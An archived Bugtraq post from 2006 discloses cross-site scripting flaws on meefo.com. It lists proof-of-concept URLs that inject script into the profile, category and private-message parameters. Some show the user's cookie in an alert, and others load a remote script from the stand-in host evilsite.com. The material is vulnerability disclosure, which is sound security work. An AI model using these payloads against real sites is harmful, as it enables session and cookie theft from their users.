Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Meefo.com - XSS with cookie include

From: luny () youfucktard com
Date: 10 Jun 2006 21:38:05 -0000
Meefo.com

Homepage:
http://meefo.com

Effected files:
reading profiles
index.php
input boxes onprofiles
sending private msgs

------------------------------

Reading aprofile and with cookie include PoC:
Since data isn't properlly filtered (backslashes are added to ' and "), a user can input malicious data, such as 

<script>alert(document.cookie)</script> and itwill popup with the users cookie. Incldued at the end of this article are 

screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.

http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>

When editing your profile, data isn't properally filtered in theinput boxes either, so <script>alert(document.cookie)</

script> works here too.

Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>

Reading catagories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>

Sending PM's XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>


Screenshots of cookie include vulns & more:

http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg
Previous By Date Next
Previous By Thread Next

Current thread: